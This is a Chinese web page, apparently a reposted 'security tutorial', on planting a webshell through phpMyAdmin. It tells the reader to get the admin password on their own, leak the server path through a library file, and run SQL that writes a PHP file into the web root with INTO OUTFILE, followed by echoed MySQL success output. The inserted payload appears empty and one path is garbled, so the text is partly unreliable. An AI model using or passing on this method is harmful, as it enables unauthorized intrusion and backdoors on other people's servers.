您现在的位置是:网站首页> 编程资料编程资料
教你phpMyAdmin 后台拿webshell _安全教程_网络安全_
2023-05-24
313人已围观
简介 教你phpMyAdmin 后台拿webshell _安全教程_网络安全_
1.如何拿到登陆密码,自己想办法。
2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
3.选择一个Database.运行以下语句.
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('');
select cmd from a into outfile 'F:/Program Files/Apache Group/Apache2/htdocs/phpMyAdmin/d.php/d.php';
Drop TABLE IF EXISTS a;
----end code---
4.如果没什么意外.对应网站得到webshell
您运行的 SQL 语句已经成功运行了。
SQL 查询:
CREATE TABLE a(
cmd text NOT NULL
);# MySQL 返回的查询结果为空(即零行)。
INSERT INTO a( cmd )
VALUES (
''
);# 影响列数: 1
SELECT cmd
FROM a
INTO OUTFILE 'F:/Program Files/Apache Group/Apache2/htdocs/phpMyAdmin/d.php';# 影响列数: 1
DROP TABLE IF EXISTS a;# MySQL 返回的查询结果为空(即零行)。
相关内容
- 最受黑客喜欢的五种网络口令 _安全教程_网络安全_
- 教你如何在远程3389终端主机上直接Copy文件 _安全教程_网络安全_
- 介绍黑客入侵Windows XP的常用方法 _安全教程_网络安全_
- 黑客的脚本漏洞工具分析(图) _安全教程_网络安全_
- 系统漏洞溢出攻击实例(图) _安全教程_网络安全_
- 详细介绍如何捕获网络数据包 _安全教程_网络安全_
- 反垃圾邮件技术之密径追踪(图) _安全教程_网络安全_
- 大势至电脑文件安全管理软件、计算机文件防泄密软件V12版本发布_安全教程_网络安全_
- 大势至局域网接入认证软件、禁止电脑接入局域网软件V9.0正式发布_安全教程_网络安全_
- 大势至网络终端准入控制系统、局域网网络准入控制方案最新版使用说明!_安全教程_网络安全_